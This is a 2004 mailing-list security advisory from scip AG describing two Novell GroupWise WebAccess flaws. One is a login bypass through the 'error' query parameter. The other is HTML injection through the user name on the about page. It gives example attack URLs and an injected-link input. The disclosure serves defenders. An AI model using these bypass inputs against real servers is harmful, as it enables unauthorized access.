<<< Date Index >>>     <<< Thread Index >>>

Novell GroupWise WebAccess error modules loading



 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear ladies and gentlemen

We have found a potential security vulnerability in the Novell GroupWise 
WebAccess error module handling. First of all it is possible to circumvent the 
login procedure. If a user connects to https://www.scip.com:1444/servlet/webacc 
(this is just an example with our domain) he is able to authenticate with his 
user name and password. If a wrong input is made, the webacc application is 
loading the error page. It is possible to specify another error document with 
the $QUERY_STRING variant error. If this reference is done for the webacc 
itself - the url https://www.scip.com:1444/servlet/webacc?error=webacc would be 
required -, the login is circumvented. You are always logged in with a "ghost 
user" without a profile. It seems not to be possible to load and store data or 
to use other services (e.g. address book or sending email). It is also possible 
to reach specific template files with specification of their names (e.g. 
https://www.scip.com:1444/servlet/webacc?error=send for sending emails). 
Reaching other files than with the extension .htt or files outside the 
webserver root directory seems not possible. An attacker may use this 
vulnerability to exploit a bug that is only exploitable by authenticated users. 
More details on how this htt framework should be used can be found at 
http://developer.novell.com/ndk/doc/gwwbacc/index.html?page=/ndk/doc/gwwbacc/gwwebacc/data/a6l4t54.html
 - You find the original advisory, written in german, on 
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=1020 (Novell GroupWise WebAccess 
error Authentisierung umgehen).

The second flaw depends on the first one. You are able to specify a (wrong) 
user name in the login screen. Afterwards you circumvent the authentication as 
described before. If you are opening the about screen (e.g. 
https://www.scip.com:1444/servlet/webacc?error=about or by clicking on the 
WebAccess logo on the top) in the Program Release line you see the version data 
of the GroupWise installation. The user name that has been specified in your 
last login procedure is printed on the Userid line. It may be possible to do 
html injection in this case. For example if the user name "<a 
href=http://www.scip.ch>www.scip.ch</a>" has been used, this html link will be 
printed. The injection of scripts seems not to be possible because the required 
tags <script> and </script> are filtered/replaced. This vulnerability may be 
useful to gain the version data of the installation and it may be possible to 
realize a social engineering or html injection attack (e.g. loading a corrupt 
JPEG file to exploit the Windows buffer overflow). You find the original 
advisory, written in german, on 
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=1021 (Novell GroupWise WebAccess 
error about erweiterte Rechte).

We have not found any information on that issue. So I sent this information 
(nearly the same posting) on 14/12/04 to info@xxxxxxxxxx and asked for a 
solution. As I haven't heard _anything_ until 23/12/04 I sent a reminder email 
to the same address. So no reply came back we made this vulnerability public 
finally to force Novell to react on this case. An Attack Tool Kit (ATK) plugin 
that addresses this vulnerability will be published in the next days[1].

Regards,

Marc Ruef

[1] http://www.computec.ch/projekte/atk/

- -- 
) scip AG (
Technoparkstr. 1
8005 Zürich
T +41 1 445 18 18 
F +41 1 445 18 19

maru@xxxxxxx
www.scip.ch

- - Aktuellste IT-Sicherheitsluecken -

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
Comment: http://www.scip.ch

iQA/AwUBQevrDBe5hzJzqVMhEQJrtQCg041eH6NVBOQ+GPS5QudSw2ARKAAAni/P
tTao1cSGtOUvnKKsqqH5/0Gs
=A+fy
-----END PGP SIGNATURE-----